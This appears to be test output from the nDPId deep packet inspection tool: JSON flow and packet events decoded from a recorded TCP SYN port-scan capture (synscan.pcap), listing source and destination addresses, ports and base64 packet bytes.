-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1610,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1600,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAsjnEAADUGhQGsEAAIQA2GNIzTI4zdU4MZAAAAAGACCAANAAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1611,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5950,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1611,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1601,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAsG1AAADIG+yKsEAAIQA2GNIzTFz7dU4MZAAAAAGACDAAVTgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1612,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1612,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1602,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAsYUcAADEGtiusEAAIQA2GNIzTVEPdU4MZAAAAAGACCADcSAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1613,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060850,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1613,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1603,"flow_packet_id":1,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060850,"pkt":"ACYLMQczACWzv5HuCABFAAAs2SUAACUGSk2sEAAIQA2GNIzTBB7dU4MZAAAAAGACCAAsbgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1614,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060866,"flow_last_seen":1278275060866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060866,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1614,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1604,"flow_packet_id":1,"flow_last_seen":1278275060866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060866,"pkt":"ACYLMQczACWzv5HuCABFAAAsyi8AACkGVUOsEAAIQA2GNIzTA\/7dU4MZAAAAAGACCAAsjgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1615,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060866,"flow_last_seen":1278275060866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060866,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1615,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1605,"flow_packet_id":1,"flow_last_seen":1278275060866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060866,"pkt":"ACYLMQczACWzv5HuCABFAAAsoM4AACgGf6SsEAAIQA2GNIzTBhTdU4MZAAAAAGACBAAueAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1616,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1616,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1606,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsho4AACUGnOSsEAAIQA2GNIzTB4\/dU4MZAAAAAGACCAAo\/QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1617,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1617,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1607,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAs9nsAACkGKPesEAAIQA2GNIzTBArdU4MZAAAAAGACCAAsggAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1618,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1618,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1608,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAseCYAADUGm0ysEAAIQA2GNIzTB\/vdU4MZAAAAAGACCAAokQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1619,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1619,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1609,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsC2kAACgGFQqsEAAIQA2GNIzTIGLdU4MZAAAAAGACBAAUKgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1620,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1620,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1610,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsiWIAADkGhhCsEAAIQA2GNIzTCRPdU4MZAAAAAGACCAAneQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1621,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1621,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1611,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/DUAAC0GHz2sEAAIQA2GNIzTE5HdU4MZAAAAAGACCAAc+wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1622,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6692,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1622,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1612,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsO2YAACcG5gysEAAIQA2GNIzTGiTdU4MZAAAAAGACEAAOaAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1623,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10215,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1623,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1613,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsqMAAACwGc7KsEAAIQA2GNIzTJ+fdU4MZAAAAAGACBAAMpQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1624,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1624,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1614,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsPlMAACYG5B+sEAAIQA2GNIzTHcvdU4MZAAAAAGACDAAOwQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1625,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1039,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1625,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1615,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsjvcAADgGgXusEAAIQA2GNIzTBA\/dU4MZAAAAAGACBAAwfQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1626,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1626,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1616,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsFNkAADgG+5msEAAIQA2GNIzTAmjdU4MZAAAAAGACBAAyJAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1627,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1627,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1617,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/MAAADIGGbKsEAAIQA2GNIzTJyndU4MZAAAAAGACDAAFYwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1628,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3371,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1628,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1618,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAs4i0AAC4GOEWsEAAIQA2GNIzTDSvdU4MZAAAAAGACDAAfYQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1629,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1629,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1619,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAsjYYAADoGgOysEAAIQA2GNIzT1w\/dU4MZAAAAAGACDABVfAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1630,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060899,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1630,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1620,"flow_packet_id":1,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060899,"pkt":"ACYLMQczACWzv5HuCABFAAAs45YAADgGLNysEAAIQA2GNIzTBE7dU4MZAAAAAGACBAAwPgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1631,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060900,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1631,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1621,"flow_packet_id":1,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060900,"pkt":"ACYLMQczACWzv5HuCABFAAAsjPEAADMGiIGsEAAIQA2GNIzSFa7dUoMYAAAAAGACEAAS4QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1632,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060900,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2638,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1632,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1622,"flow_packet_id":1,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060900,"pkt":"ACYLMQczACWzv5HuCABFAAAstTEAADcGXEGsEAAIQA2GNIzSCk7dUoMYAAAAAGACEAAeQQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1633,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060900,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":515,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1633,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1623,"flow_packet_id":1,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060900,"pkt":"ACYLMQczACWzv5HuCABFAAAskyUAADIGg02sEAAIQA2GNIzSAgPdUoMYAAAAAGACDAAqjAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1634,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060902,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1634,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1624,"flow_packet_id":1,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060902,"pkt":"ACYLMQczACWzv5HuCABFAAAs+zgAADYGFzqsEAAIQA2GNIzSAivdUoMYAAAAAGACDAAqZAAAAgQFtA=="} 